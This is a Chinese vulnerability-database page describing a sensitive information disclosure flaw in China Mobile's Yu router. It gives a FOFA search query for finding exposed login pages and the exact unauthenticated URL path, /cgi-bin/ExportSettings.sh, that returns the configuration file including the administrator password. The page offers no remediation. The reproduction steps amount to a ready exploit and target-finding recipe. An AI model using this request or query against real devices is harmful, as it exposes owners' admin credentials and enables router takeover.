中国移动_禹路由_ExportSettings.sh_敏感信息泄露漏洞-棉花糖会员站

中国移动_禹路由_ExportSettings.sh_敏感信息泄露漏洞

7月15日发布

020

# 中国移动禹路由 ExportSettings.sh 敏感信息泄露漏洞

## 漏洞描述

中国移动禹路由 ExportSettings.sh 存在敏感信息泄露漏洞，攻击者通过漏洞获取配置文件，其中包含账号密码等敏感信息

## 漏洞影响

> 中国移动禹路由

## FOFA

> title=”互联世界物联未来-登录”

## 漏洞复现

登录页面如下

![1](/static/qingy/中国移动_禹路由_ExportSettings.sh_敏感信息泄露漏洞/img/1.png)

访问Url

“`
/cgi-bin/ExportSettings.sh
“`

![2](/static/qingy/中国移动_禹路由_ExportSettings.sh_敏感信息泄露漏洞/img/2.png)

其中password为登录后台密码

© 版权声明

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

喜欢就支持一下吧

相关推荐

评论抢沙发

请登录后发表评论

请登录后查看评论内容